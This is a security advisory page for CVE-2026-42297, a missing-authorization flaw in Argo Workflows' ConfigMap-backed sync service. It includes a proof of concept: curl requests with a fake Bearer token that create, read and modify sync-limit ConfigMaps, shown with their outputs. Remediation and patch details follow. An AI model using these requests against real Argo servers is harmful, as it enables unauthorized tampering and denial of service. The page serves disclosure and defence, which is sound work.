Argo Workflows CVE-2026-42297
HIGHSeverity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from Vendor (https://github.com/argoproj/argo-workflows).
CVSS VectorVendor: https://github.com/argoproj/argo-workflows
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
5DescriptionCVE.org
Summary
The Sync Service's ConfigMap-backed provider (server/sync/sync_cm.go) performs zero authorization checks on all CRUD operations (create, read, update, delete). Any authenticated user - including those using fake Bearer tokens - can create, read, update, and delete Kubernetes ConfigMaps containing synchronization limits.
Details
The ConfigMap-backed provider (server/sync/sync_cm.go) has no auth.CanI checks:
// sync_cm.go - UNPROTECTED
func (s *configMapSyncProvider) createSyncLimit(ctx context.Context, req *syncpkg.CreateSyncLimitRequest) {
// NO auth.CanI check
kubeClient := auth.GetKubeClient(ctx)
configmapGetter := kubeClient.CoreV1().ConfigMaps(req.Namespace)
// ... directly creates/updates ConfigMaps
}server/sync/sync_cm.go- lines 23-155- All four SyncService endpoints:
CreateSyncLimit,GetSyncLimit,UpdateSyncLimit,DeleteSyncLimit
PoC
Prerequisites
- Argo Server running with
--auth-mode=server - Port-forward:
kubectl port-forward -n argo svc/argo-server 2746:2746
Step 1: Create Sync Limit (Fake Token)
curl -sk -X POST "https://localhost:2746/api/v1/sync/default" \
-H "Authorization: Bearer fake-token" \
-H "Content-Type: application/json" \
-d '{"type": 0, "namespace": "default", "cmName": "test-sync", "key": "test-key", "limit": 5}'Result: {"namespace":"default","cmName":"test-sync","key":"test-key","limit":5}
Verify ConfigMap was created in Kubernetes:
kubectl get configmap test-sync -n defaultNAME DATA AGE
test-sync 1 74sStep 2: Read Sync Limit (Fake Token)
curl -sk "https://localhost:2746/api/v1/sync/default/test-key?type=0&cmName=test-sync" \
-H "Authorization: Bearer fake-token"Result: {"namespace":"default","cmName":"test-sync","key":"test-key","limit":5}
Step 3: Update Sync Limit (Fake Token)
curl -sk -X PUT "https://localhost:2746/api/v1/sync/default/test-key" \
-H "Authorization: Bearer fake-token" \
-H "Content-Type: application/json" \
-d '{"type": 0, "namespace": "default", "cmName": "test-sync", "key": "test-key", "limit": 999}'Result: {"namespace":"default","cmName":"test-sync","key":"test-key","limit":999}
Verify the ConfigMap was actually modified:
kubectl get configmap test-sync -n default -o jsonpath='{.data.test-key}'999Impact
An attacker with network access to the Argo Server can:
- Denial of Service - Set sync limits to
0or1, blocking all parallel workflow execution - Workflow Disruption - Modify existing sync limits to break running workflows
- Information Disclosure - Read ConfigMap data that may contain sensitive configuration
- Arbitrary ConfigMap Manipulation - Create/delete ConfigMaps in any namespace accessible to the server's service account
Related CVEs
- CVE-2026-28229 (GHSA-56px-hm34-xqj5): Unauthorized access to WorkflowTemplate endpoints - same root cause (missing
auth.CanIcheck) - CVE-2024-53862 (GHSA-h36c-m3rf-34h9): Archived workflow auth bypass - same pattern
AnalysisAI
Missing authorization checks in Argo Workflows v4.0.0-4.0.4 allow any authenticated user-even those with fake Bearer tokens-to create, read, update, and delete Kubernetes ConfigMaps containing workflow synchronization limits. The ConfigMap-backed sync provider (server/sync/sync_cm.go) completely omits auth.CanI permission validation on all four CRUD endpoints. Publicly available exploit code exists (detailed PoC in advisory). CVSS 8.5 reflects network-accessible authentication bypass enabling high integrity/availability impact through denial-of-service and arbitrary ConfigMap manipulation. Patch released in version 4.0.5 adding checkConfigMapPermission() calls to validate Kubernetes RBAC before operations.
Technical ContextAI
Argo Workflows is a Kubernetes-native workflow orchestration engine. The vulnerability resides in the Sync Service's ConfigMap-backed provider (server/sync/sync_cm.go lines 23-155), which manages workflow concurrency limits stored as Kubernetes ConfigMaps. The code directly invokes Kubernetes API operations (kubeClient.CoreV1().ConfigMaps) without calling the auth.CanI authorization helper used elsewhere in the codebase. This is an instance of CWE-862 (Missing Authorization), where authentication exists (--auth-mode=server validates bearer tokens) but authorization checks are absent. The flaw affects all four endpoints: CreateSyncLimit, GetSyncLimit, UpdateSyncLimit, DeleteSyncLimit. The vulnerability is part of a broader pattern in Argo Workflows-related CVE-2026-28229 (WorkflowTemplate endpoints) and CVE-2024-53862 (archived workflows) share the same missing auth.CanI root cause. The fix introduces a checkConfigMapPermission() function that validates Kubernetes RBAC verb permissions (create/get/update/delete) against the configmaps resource in the target namespace before executing operations.
RemediationAI
Upgrade to Argo Workflows version 4.0.5 or later, released at https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5. The patch (commit 09fff05e0830c14a5e36cc40597ad84881db1ab6 at https://github.com/argoproj/argo-workflows/commit/09fff05e0830c14a5e36cc40597ad84881db1ab6) introduces checkConfigMapPermission() authorization checks to all four affected endpoints. If immediate patching is not feasible, implement compensating controls: (1) Restrict network access to Argo Server using Kubernetes NetworkPolicies or firewall rules to trusted IP ranges only-this reduces attack surface but does not eliminate risk from insider threats or compromised trusted networks; (2) Switch from --auth-mode=server to --auth-mode=client which enforces Kubernetes RBAC through service account tokens, though this requires reconfiguring authentication workflows and may break existing integrations; (3) Apply least-privilege Kubernetes RBAC to the Argo Server service account, limiting ConfigMap create/update/delete permissions to only namespaces that absolutely require sync functionality-note this is defense-in-depth and does not fix the authorization bypass itself; (4) Monitor for suspicious ConfigMap modifications in Argo-managed namespaces using Kubernetes audit logs filtering for configmaps.create/update/delete events from the Argo Server service account. All workarounds have operational trade-offs and upgrading remains the definitive fix. Full vendor advisory at https://github.com/argoproj/argo-workflows/security/advisories/GHSA-xchc-cqwg-g76q.
More in Kubernetes
View allA critical vulnerability in Kubernetes ingress-nginx controller allows unauthenticated attackers with pod network access
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Kubernetes ingress-nginx contains a configuration injection vulnerability via the mirror-target and mirror-host Ingress
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-url` Ingres
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-tls-match-c
Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.exter
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Rated critical severity (CVSS 9.9), this vulne
The Kubernetes integration in GitLab Enterprise Edition 11.x before 11.2.8, 11.3.x before 11.3.9, and 11.4.x before 11.4
Kyverno Kubernetes policy engine prior to 1.x has a privilege escalation vulnerability (CVSS 9.9) allowing policy bypass
Kamaji is the Hosted Control Plane Manager for Kubernetes. Rated critical severity (CVSS 9.9), this vulnerability is rem
Jumpserver is a popular open source bastion host, and Koko is a Jumpserver component that is the Go version of coco, ref
String filter bypass in Inspektor Gadget Kubernetes eBPF tooling before fix. Insufficient string escaping enables filter
Same weakness CWE-862 – Missing Authorization
View allSame technique Authentication Bypass
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-xchc-cqwg-g76q